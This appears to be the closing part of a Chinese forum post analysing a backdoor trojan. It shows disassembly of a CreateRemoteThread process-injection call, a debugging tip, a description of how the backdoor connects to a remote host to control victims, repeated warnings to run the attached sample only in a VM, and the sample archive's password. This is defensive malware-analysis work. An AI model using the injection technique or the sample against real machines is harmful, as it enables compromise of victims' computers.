0040351E |. 6A 00 PUSH 0
00403520 |. 6A 00 PUSH 0
00403522 |. 8B8D 28FAFFFF MOV ECX,DWORD PTR SS:[EBP-5D8]
00403528 |. 51 PUSH ECX
00403529 |. 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
0040352C |. 8B82 90000000 MOV EAX,DWORD PTR DS:[EDX+90]
00403532 |. FFD0 CALL EAX ; kernel32.CreateRemoteThread 看,又是这一古老而精典的注入方式。
结束!注入部分,你同样可以参照我
http://bbs.pediy.com/showthread.php?t=77523 最后提到的,修改CreateRemoteThread 入口指令的第一个字节为CC
结束语:malware分析需要的是毅力和横心,这里主要是将一个木马过程剖析开来,语文水平有限,这个主要是后门类型的木马,一旦中此后门,本后面会连接到远程主机,远程黑
客可能控制你的电脑,你的电脑将成为,如MSN机器人,Flood 肉鸡。。本样本还将做后续分析:具体剖析其后门行为是如何实现的,以及一些还没有挖掘出来的东西。
欢迎讨论。
特别申明:附件里面的exe-1文件为木马,如想调试分析,请在虚拟环境中调试,切不可在本机执行。
特别申明:附件里面的exe-1文件为木马,如想调试分析,请在虚拟环境中调试,切不可在本机执行。
特别申明:附件里面的exe-1文件为木马,如想调试分析,请在虚拟环境中调试,切不可在本机执行。
附件包含木马样本,以及我分析的IDB文件,切记不要在本机分析以及执行木马样本,本样本的危害程度很大。附件已经加密:
默认密码infected
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
